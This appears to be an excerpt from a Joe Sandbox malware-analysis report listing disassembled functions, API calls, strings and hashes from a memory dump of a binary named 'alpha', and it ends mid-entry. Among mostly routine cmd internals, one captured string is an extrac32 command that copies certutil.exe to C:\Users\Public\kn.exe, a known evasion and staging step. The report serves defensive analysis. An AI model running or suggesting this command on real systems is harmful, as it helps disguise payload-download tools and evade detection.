                                              Function 00007FF6EB171F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$EnvironmentVariable
                                              • String ID: DIRCMD
                                              • API String ID: 1405722092-1465291664
                                              • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                              • Instruction ID: 1814c9bce6caa3f5ae6518d7b5a2011b79cfb4f7d928d97b093ca57e0abb9750
                                              • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                              • Instruction Fuzzy Hash: 55816E73A18BD28AEB20CF60E8403ED77A5FB4A758F104139DA4D97B68DF38D1458B05
                                              Function 00007FF6EB1799F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$wcschr$Process$AllocateFree_setjmp_wcsuprmemsetwcscmp
                                              • String ID: FOR$ IF
                                              • API String ID: 557945885-2924197646
                                              • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                              • Instruction ID: 07909195b725e63c0cbfec231d3396397b62ae8ccc94217f9a41b763582a32e7
                                              • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                              • Instruction Fuzzy Hash: 9C51CF22B09A5291EE14AB15E4103FA6691FF4EBF8F584234D91EC73F5DE7EE405830A
                                              Function 00007FF6EB17F173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: iswdigit$iswspacewcschr
                                              • String ID: )$=,;
                                              • API String ID: 1959970872-2167043656
                                              • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                              • Instruction ID: af08195b2b202225c68c21df8c5b82271e1d6a6c7cc0c7f6216601b4a5df6d99
                                              • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                              • Instruction Fuzzy Hash: 1641AE63E082E2C6FB648B10E5543FA67A0AF1A779F444031C989832F4DF7EA4458B0A
                                              Function 00007FF6EB19BA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                              • String ID: %04X-%04X$:
                                              • API String ID: 930873262-1938371929
                                              • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                              • Instruction ID: 7366c8a9e7b8deeeea217ead1975e94ec53d078526fd1ba36f27cb3ac1715393
                                              • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                              • Instruction Fuzzy Hash: E3417333A08A82C2EB249B50F5503FAB260FB8D768F404135D94E836E5DF7EE545C716
                                              Function 00007FF6EB1836EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                              • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                              • API String ID: 3249344982-2616576482
                                              • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                              • Instruction ID: f86b5159d5a5c848605d13e110b658d0cfee45f5bbf3a5a953eeabae2e2916e0
                                              • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                              • Instruction Fuzzy Hash: 59417173A18B4186E3108F11A9443A9BAA4FB4DFE8F484234EA4D877A8CF7DD1158B05
                                              Function 00007FF6EB186A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$iswdigit
                                              • String ID: +-~!$<>+-*/%()|^&=,
                                              • API String ID: 2770779731-632268628
                                              • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                              • Instruction ID: 472b3129e3548d39ca848f1a81b66bfba1b0d1af9048d41cda148cac636fec46
                                              • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                              • Instruction Fuzzy Hash: 5E310D23609A56C5E6509F91F4503B9B7A0FB4DFA9B458135DA4E83374EF3EE404C706
                                              Function 00007FF6EB19D878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                              • String ID:
                                              • API String ID: 3192234081-0
                                              • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                              • Instruction ID: e19ea9c48758fcf2ae5c322ec63986ad6d96848224a672fa183f3a8eaaffe353
                                              • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                              • Instruction Fuzzy Hash: 9D3188326086528BE7109F21F4047BDBB51FB8EBA8F449134DE4A977A5CF3DD4058B05
                                              Function 00007FF6EB181630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF6EB1814D6,?,?,?,00007FF6EB17AA22,?,?,?,00007FF6EB17847E), ref: 00007FF6EB181673
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6EB1814D6,?,?,?,00007FF6EB17AA22,?,?,?,00007FF6EB17847E), ref: 00007FF6EB18168D
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6EB1814D6,?,?,?,00007FF6EB17AA22,?,?,?,00007FF6EB17847E), ref: 00007FF6EB181757
                                              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6EB1814D6,?,?,?,00007FF6EB17AA22,?,?,?,00007FF6EB17847E), ref: 00007FF6EB18176E
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6EB1814D6,?,?,?,00007FF6EB17AA22,?,?,?,00007FF6EB17847E), ref: 00007FF6EB181788
                                              • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6EB1814D6,?,?,?,00007FF6EB17AA22,?,?,?,00007FF6EB17847E), ref: 00007FF6EB18179C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Alloc$Size
                                              • String ID:
                                              • API String ID: 3586862581-0
                                              • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                              • Instruction ID: 1d15ae4026c25637d911d58680faad9027f113815635cc8e1c4069856e2684ec
                                              • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                              • Instruction Fuzzy Hash: 87917E23A09B4281EA118B15E5503F8B7A1FB4DBA8F598139DE4D833B4DF3EE455C70A
                                              Function 00007FF6EB1886F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                              • String ID:
                                              • API String ID: 1313749407-0
                                              • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                              • Instruction ID: 10d62423b2bcc66fdcd567799fa2fab4d19d988bbe3890003d48e03c56fb227d
                                              • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                              • Instruction Fuzzy Hash: 6C51F823A0878282FA519B15A9143F9A6A1FF4DBB8F184134CD1E977F4DF3EE440870A
                                              Function 00007FF6EB19EC14 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                              • String ID:
                                              • API String ID: 920682188-0
                                              • Opcode ID: 709d1c67be100917fc71fda4c7ad07296061441c4da44e249bcfadc6653ab77c
                                              • Instruction ID: 214cb7e0246f82e835fad5978f8eb8ed1e71b35dcdd9d7fe295960f9edae907b
                                              • Opcode Fuzzy Hash: 709d1c67be100917fc71fda4c7ad07296061441c4da44e249bcfadc6653ab77c
                                              • Instruction Fuzzy Hash: CD512533605B818AEB25CF20E8543E877A0FB8DB98F048135CA4E87764EF3DD6598B05
                                              Function 00007FF6EB17DF60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF6EB17E00B
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$FreeProcess_setjmp
                                              • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                              • API String ID: 777023205-3344945345
                                              • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                              • Instruction ID: cf36f06f133a62bc00b5ab22ec418b7a044bb8251ed11f02a5af64e0218fa24b
                                              • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                              • Instruction Fuzzy Hash: 84512633A0DA52C5EA518B15F8903B8B6A4FF4DB6CF544436D90DC33B9DF7EA441860A
                                              Function 00007FF6EB17F5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: iswdigit$iswspacewcschr
                                              • String ID: )$=,;
                                              • API String ID: 1959970872-2167043656
                                              • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                              • Instruction ID: df352250d109ca7956a985ed79e3d3c9b5db8d09ff17967d40cd9a149b8d7bfb
                                              • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                              • Instruction Fuzzy Hash: 8B416C67E182E2C6FB648B10D5543FA27A0AF1A779F545035C989832F4CF7EA4458A0B
                                              Function 00007FF6EB1991B8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsnicmpfprintfwcsrchr
                                              • String ID: CMD Internal Error %s$%s$Null environment
                                              • API String ID: 3625580822-2781220306
                                              • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                              • Instruction ID: 4da7d131c2df6112f642493ada3866c8399b1c262815b78d8db4fc0bb442522a
                                              • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                              • Instruction Fuzzy Hash: 5831D023A0868682EA109B42E5003FA72A1BB4DBF8F044134DD1D977F5EF3EF495834A
                                              Function 00007FF6EB181FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memsetwcsspn
                                              • String ID:
                                              • API String ID: 3809306610-0
                                              • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                              • Instruction ID: a73a8792297089c6f666fa89e20f1ad291be07f4851f4fb20ae85c6dd45a969f
                                              • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                              • Instruction Fuzzy Hash: A8B1A163A08B4682EA518F15E4503F9B7A1FB4DBA8F848031DA4E877B4DF7EE441C746
                                              Function 00007FF6EB198C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$iswdigit$wcstol
                                              • String ID:
                                              • API String ID: 3841054028-0
                                              • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                              • Instruction ID: f705a1376a5a0a4531b07d25c2524e1a6d5d84d741a4950ec48c58d010215ea7
                                              • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                              • Instruction Fuzzy Hash: 7D51E62790869291E7219B1598003F976F1FF6DBB8B448232DE5DC22F4DF3EE441C219
                                              Function 00007FF6EB175984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                              Download Yara Rule
                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB193687
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6EB17260D), ref: 00007FF6EB1936A6
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6EB17260D), ref: 00007FF6EB1936EB
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB193703
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6EB17260D), ref: 00007FF6EB193722
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$Write_get_osfhandle$Mode
                                              • String ID:
                                              • API String ID: 1066134489-0
                                              • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
